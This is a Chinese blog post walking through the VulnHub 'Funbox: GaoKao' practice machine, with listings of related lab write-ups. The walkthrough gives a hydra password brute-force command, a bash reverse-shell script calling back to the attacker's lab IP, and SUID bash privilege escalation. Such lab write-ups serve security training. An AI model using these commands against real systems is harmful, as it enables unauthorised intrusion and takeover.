VulnHub渗透测试实战靶场 - Funbox: GaoKao

最新推荐文章于 2024-05-02 20:46:40 发布
最新推荐文章于 2024-05-02 20:46:40 发布
阅读量1k 收藏
点赞数 2
文章标签: linux VulnHub 渗透测试 原力计划 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LYJ20010728/article/details/119970617
版权

VulnHub渗透测试实战靶场 - Funbox: GaoKao

题目描述

It's a box for beginners, but not easy. Gather careful !!!

Hint:

Don't waste your time ! Every BruteForce-Attack at all ports can be stopped after 1500 trys per account.

Enjoy the game and WYSIWYG !

This works better with VirtualBox rather than VMware

环境下载

Funbox: Lunchbreaker靶机搭建

  1. 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式
  2. 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only
  • 目标靶机的 IP 地址为:192.168.56.117
  • 攻击机的 IP 地址为:192.168.56.102

渗透测试

信息搜集

用 Nmap 扫描一下目标靶机的端口信息:sudo nmap -sS -A -Pn 192.168.56.117,发现开放了 21、22、80、3306 四个端口

用 dirb 扫描一下 80 端口 web 目录:dirb http://192.168.56.116

漏洞挖掘

  • web 页面没有什么发现,尝试匿名登录 ftp,提示用户 sky
  • 利用 hydra 爆破 sky 用户的密码,得到密码为 thebest
hydra -l sky -P rockyou.txt 192.168.56.117 ssh
  • 登录 ftp,发现存在一个文件 user.flag,下载到本地查看后发现可以改写内容来反弹 shell
#!/bin/sh
bash -i >& /dev/tcp/192.168.56.102/1234 0>&1;
  • 将改写好的文件重新上传回去

getshell

  • 开启 nc 监听,成功接收到反弹的 shell

提权

  • 由于 sudo -l 命令不知道密码无法使用,执行命令 find / -perm -u=s -type f 2>/dev/null,查看可以利用啥来进行提权
  • 利用 /bin/bash -p 来进行提权,成功拿到 root 权限
H3rmesk1t
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
vulnhub靶机实战--FunBox:1
m0_64312309的博客
09-21 488
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
docker-funbox:具有有趣的终端命令和ASCII艺术的Docker容器
05-04
Docker Funbox 带有有趣怪异终端命令和ASCII艺术的容器。 特色 按字母顺序: 洛尔卡特 喵喵猫 管道 RIG-随机身份生成器 sl (不要与ls混淆) 洗手间 VLC S 基本用法 $ docker run --rm -it wernight/funbox _ ...
Vulnhub日记(一):FunboxGaoKao
Dawn_Xi的博客
08-03 477
靶机介绍 FunBox.GaoKao 是作者为初学者设计的机器。这台机器需要一点暴力破解和一些FTP协议的知识。“Funbox Gaokao Walkthrough – Vulnhub – Writeup” 主要参考Krishna Upadhyay的WriteUp所写 虚拟机链接:https://www.vulnhub.com/entry/funbox-gaokao,707/ 开始练习 使用Nmap找到靶机ip:192.168.56.101 本机ip:192.168.56.102 nm.
vulnhub靶场FunBox-2
最新发布
qq_58091216的博客
05-02 508
新建一个 MS02423文件夹把下载的压缩包文件都放进去发现里面都是加密的 id_rsa再把 /usr/share/wordlists/rockyou.txt字典 复制进去。我们可以看到报错了,那么这个办法是行不通的,我们换一个思路,我们查看ftp访问。我们可以看到成功绕过,我们查看home目录下的文件。我们看到好多的压缩包而且都是加密的,我们进行爆破。我们可以看到权限是root,我们直接查看flag。我们通过密码获取到tom的私钥,我们进行登录。我们知道tom的密码了,那么我们直接进行登录。
vulnhub Funbox: GaoKao(funbox9)
箭雨镜屋
04-08 917
渗透思路:nmap扫描----ftp匿名访问获取可能的用户名----hydra爆破ftp密码----ftp上传反弹shell,等定时任务执行获得shell----bash suid提权
靶机渗透练习30-Funbox9-GaoKao
hirak0的博客
04-18 868
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-gaokao,707/ Description It’s a box for beginners, but not easy. Gather careful !!! Hint: Don’t waste your time ! Every BruteForce-Attack at all ports can be stopped after 1500 trys per account. Enjoy the game
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox9(GaoKao
Aluxian_的博客
09-17 1050
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。FunBox系列第九个靶机了 这个靶机比较简单1.信息收集 获取ip地址 和端口信息2.hydra暴力破解 (工具的基本使用)3.bash的反弹shell(主要是记住回弹命令)3.bash suid提权(第一次使用挺简单的)这是这个系列第八个靶机啦比较简单 希望对刚入门得小白有帮助!
funxbox-test:Funbox的测试任务
05-08
Funbox的测试任务 要启动它: npm安装 凉亭安装 吞咽 喝一口 gulp测试(用于测试) 通过在文本框中输入名称并按Enter,可以添加新的航点。 此后: 输入的路径点显示在已添加点列表的末尾; 标记会出现在地图...
funbox:测试和工具程序
02-11
"funbox"是一个用于测试和工具程序的项目,主要基于C语言开发。在软件开发过程中,测试和工具程序起着至关重要的作用,它们能够帮助开发者有效地检查代码质量、定位问题以及提升开发效率。下面我们将详细探讨这个...
i-FunBox 中文版 v1.96.938.649
04-27
软件介绍 iFunBox是一款小巧的iPhone, iPad 和 iPod Touch文件管理软件。无须越狱和任何破解,可以直接使用,不安装任何守护进程。 界面类似于windows资源管理器,以简练时尚的窗口方式浏览和管理iPhone、iPad、iPod...
funbox_reactapp:测试
05-11
该项目是通过引导的。 您将在下面找到一些有关如何执行常见任务的信息。 您可以在找到本指南的最新版本。目录自动格式化代码更改页面<title>... 使用AJAX请求获取数据与API后端集成节点Ruby on Rails 在开发中...
page+widget.rar
09-02
page+widget.rar
VulnHub_FunBox
qq_45434762的博客
08-29 554
发现目标主机我们使用nmap扫描整个网段sudo nmap 192.168.1.0/24 扫描端口使用Nmap探测目标主机开放的端口,发现目标主机开放了,21,22,80端口sudo n...
FUNBOX: SCRIPTKIDDIE 靶场
小小猪的博客
09-09 522
获得python交互shell,查看文件。爆破目录,发现wp-admin目录。查看文件,发现proftpd利用方式。配置完成,执行,获得shell。nmap扫描靶机端口以及服务。配置完成,还需要导入监听模块。查看到21端口开放的服务。导入模块,查看相关配置。访问之后发现无法利用。
VulnHub渗透测试实战靶场 - FUNBOX: NEXT LEVEL
LYJ20010728的博客
08-27 386
VulnHub渗透测试实战靶场 - FUNBOX: NEXT LEVEL题目描述环境下载FUNBOX: NEXT LEVEL靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 题目描述 Lets separate the script-kids from script-teenies. Hint: The first impression is not always the right one! If you need hints, call me on twitter: @0815R2d2 Have
vulnhub靶场FunBox-1
qq_58091216的博客
05-01 453
但是我们发现不能使用,那么我们就换一个思路,进行解决,我们知道22端口是开启的,我们使用ssh进行登录。虚拟机开启之后界面如上,我们不知道ip,需要自己探活,网段知道:192.168.2.0/24。我们可以想到是IP地址和域名没有进行绑定,我们进行绑定即可。首先我们使用joe进行登录,但是没有发现有用的信息。我们可以发现一个404.php,我们进行利用即可。我们查看id,发现不是root权限,我们进行提权。爆破出来2个用户名和密码,我们进行登录查看。我们可以看到/home目录,我们进行查看。
VulnHub渗透测试实战靶场 - FUNBOX: CTF
LYJ20010728的博客
08-27 484
VulnHub渗透测试实战靶场 - FUNBOX: CTF题目描述环境下载FUNBOX: CTF靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 题目描述 Groundhog Day: Boot2Root ! Initial footstep is a bit flowed, but really not difficult. After getting access to Funbox: CTF, its nessesarry to find, read and understand the (2
FUNBOX_1靶场详解
weixin_44681307的博客
07-25 983
发现的确有一个计时任务,有两个用户都在运行,一个是UID为1000的,一个是root用户,只要我们能往这里面写的内容就可以拿到一个root的反弹shell。发现这个文件我们是可修改的,在里面添加了一条反弹shell文件,就等拿到UID为1000的权限或者,root权限,如过没拿到ROOT权限就重新监听一下。ssh上来后,ls一下发现有个mbox文件,发现类似两个邮件,并且是隔了几分钟的,所以就怀疑后台在运行着一个计时任务。这个系列的靶场给出的干扰因素都挺多的,必须从中找到有用的线索才可以。
FUNBOX-5靶机
小小猪的博客
06-30 346
FUNBOX-5靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.134 扫描靶机端口 访问80端口是默认的apache页面,扫描目录发现robots.txt文件,发现一个,但是试了发现没有,想到下载页面的提示,这里就没有深究 并不是目录 再次看扫描的目录 在之前的目录下拼上index.php发现是可以访问的,还有wp-content目录也是可以访问的,那么接下来就直接上神器wpscan扫描用户,至于wpscan的用法我前面有一篇
FUNBOX: UNDER CONSTRUCTION!
08-16
它有两个标志,可以在该链接下载:https://www.vulnhub.com/entry/funbox-under-construction,715/。通过主机发现工具netdiscover可以进行信息探测,命令如下:netdiscover -i eth0 -r 192.168.187.0/24。此外,在...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值